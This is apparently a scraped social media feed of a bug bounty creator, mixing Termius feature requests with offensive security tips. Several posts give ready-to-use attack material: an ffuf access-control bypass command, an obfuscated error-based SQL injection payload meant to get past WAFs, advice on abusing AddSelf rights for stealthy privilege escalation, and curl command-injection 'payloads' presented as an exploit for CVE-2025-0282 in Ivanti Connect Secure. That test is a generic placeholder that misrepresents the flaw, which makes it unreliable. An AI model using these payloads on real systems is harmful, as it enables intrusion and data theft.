IOCsec

19 posts


@IOCsec

Bug Bounty • CTF (Capture the Flag) • Hackathons • Cybersecurity Creator

Bucharest, European Union · Joined June 2023
94 Following · 6 Followers
IOCsec (@IOCsec):
@RKudiyarov @TermiusHQ Looking forward to being able to save Workspaces created with Local Terminals and reuse them. It would make my work much easier. 📍One more aspect: in a Workspace the possibility to drag & drop terminals (up-down) would be super useful, to be able to change Terminal order.
Roman Kudiyarov (@RKudiyarov):
@IOCsec @TermiusHQ We tested this feature and realized that it must save the current directory of a local terminal. We decided to remove the support of the local terminal for this release.
Termius (@TermiusHQ):
Big news: Early next year, Termius will let you easily create, save, and reopen Workspaces. It’s going to completely change how you handle multiple connections. But first, let’s talk about how we got here... 🧵
IOCsec (@IOCsec):
@NahamSec If rpcbind or rpc.statd is active, expect a flood of low-quality crawlers targeting your system, especially after any new or updated post. Use robots.txt to disallow their access, but for better protection, rely on a WAF or firewall to block them based on User-Agent or IP.
Ben Sadeghipour (@NahamSec):
I’m not sure whose crawler it is but they keep hitting one of my IP addresses and they keep getting their box exploited. 🤷🏽‍♂️
IOCsec (@IOCsec):
Discover Hidden Vulnerabilities #Fuzz smarter, not harder! Use #ffuf to uncover Broken Access Control (BAC) like a pro: 👉 ffuf -w /path/to/wordlist.txt -u target.com/FUZZ -H "X-Original-URL: /admin" Unlock doors security teams forgot to lock! #BugBounty #ffuf #BAC
IOCsec (@IOCsec):
Receive “test” in the response? The target is likely vulnerable. 🧵2/2 👉 Payload for #RCE in #IvantiConnect Secure: curl -X POST http://target/vulnerable_endpoint -d "input=; whoami > /tmp/rce_test" Crafted #payloads are the ultimate #hacking approach!
IOCsec (@IOCsec):
CVE-2025-0282: #RCE in Ivanti Connect Secure 🧵 1/1 #Ivanti Connect Secure (<22.7R2.5) allows unauthenticated remote code execution (RCE). 👉 Test if target is vulnerable: curl -X POST http://target/vulnerable_endpoint -d "input=echo test" 👇How to test and #payload
IOCsec (@IOCsec):
@TermiusHQ #Termius' new Workspace feature is awesome. How can I save a #Workspace for reuse? Consider adding options to drag & drop a terminal from a Workspace (up & down) and add a search at the top of Workspace to quickly find a (renamed) terminal from that workspace. @ update Docs.
Termius (@TermiusHQ):
Because these are big code changes, we’re releasing them in stages. The next Termius update will include the Workspace feature - just drag multiple connections in one tab and switch between the Focus Mode and Split View modes!
IOCsec (@IOCsec):
@hackinarticles Let’s not forget about targeting shadow admin accounts. #Exploiting AddSelf on less monitored, high-privilege groups can often #bypass traditional detection mechanisms, opening doors for stealthier privilege escalation paths.
IOCsec (@IOCsec):
Obfuscated #polymorphic SQLi payload: ?id=1' /*!AND*/ (/*!SELECT*/ 1 /*!FROM*/ (/*!SELECT*/ COUNT(*),CONCAT((/*!SELECT*/ DATABASE()),FLOOR(RAND(0)*2))x /*!FROM*/ INFORMATION_SCHEMA.SCHEMATA /*!GROUP BY*/ x)a)-- -
IOCsec (@IOCsec):
🎯 Payloads that Break Barriers Think your system is secure against SQLi? Think again. Even “fully patched” defenses can fail with the right payload. 🧵Thread 👉 Challenge your #WAF 👉 Test smart, stay sharp! #Payload #BugBounty #SQLi 👇 See payload
IOCsec (@IOCsec):
🎯 Targeted Scans for Precision Results Why scan an entire domain when a targeted scan saves time & effort? Focus on specific endpoints like /api/v1/login or /admin. Misconfigurations often hide here, waiting to be exploited. #BugBounty #Pentesting #ScanSmarter
IOCsec (@IOCsec):
Master Recon with Smart Tactics 💡 Most miss this step: Leverage public code repositories! 🧐 Search for keys, tokens, and sensitive files in GitHub or GitLab tied to your target. 💬 This simple step has led to high-impact findings in #BugBounty programs. #Recon #Pentesting
IOCsec (@IOCsec):
Are you testing or guessing? 🤔 Without a structured workflow, you’re leaving #AttackSurface gaps untested. In Penetration Testing & #BugBounty, luck isn’t a strategy—planning is. ➡️ How do you map your attack surface? Share your approach! #Workflow #AttackSurface #BugBounty
IOCsec (@IOCsec):
4. Delegate • If a task cannot be automated, but can be done more efficiently by someone else, delegate it to the right person.
IOCsec (@IOCsec):
3. Automate • Once you’ve eliminated and simplified, automate the processes that are worth automating. However, automating an unnecessary task is just a waste of time and resources.
IOCsec (@IOCsec):
4 Steps to #Success in 2025 If you have the plan, you're already 50% ahead of the rest. Now apply daily: 🧵thread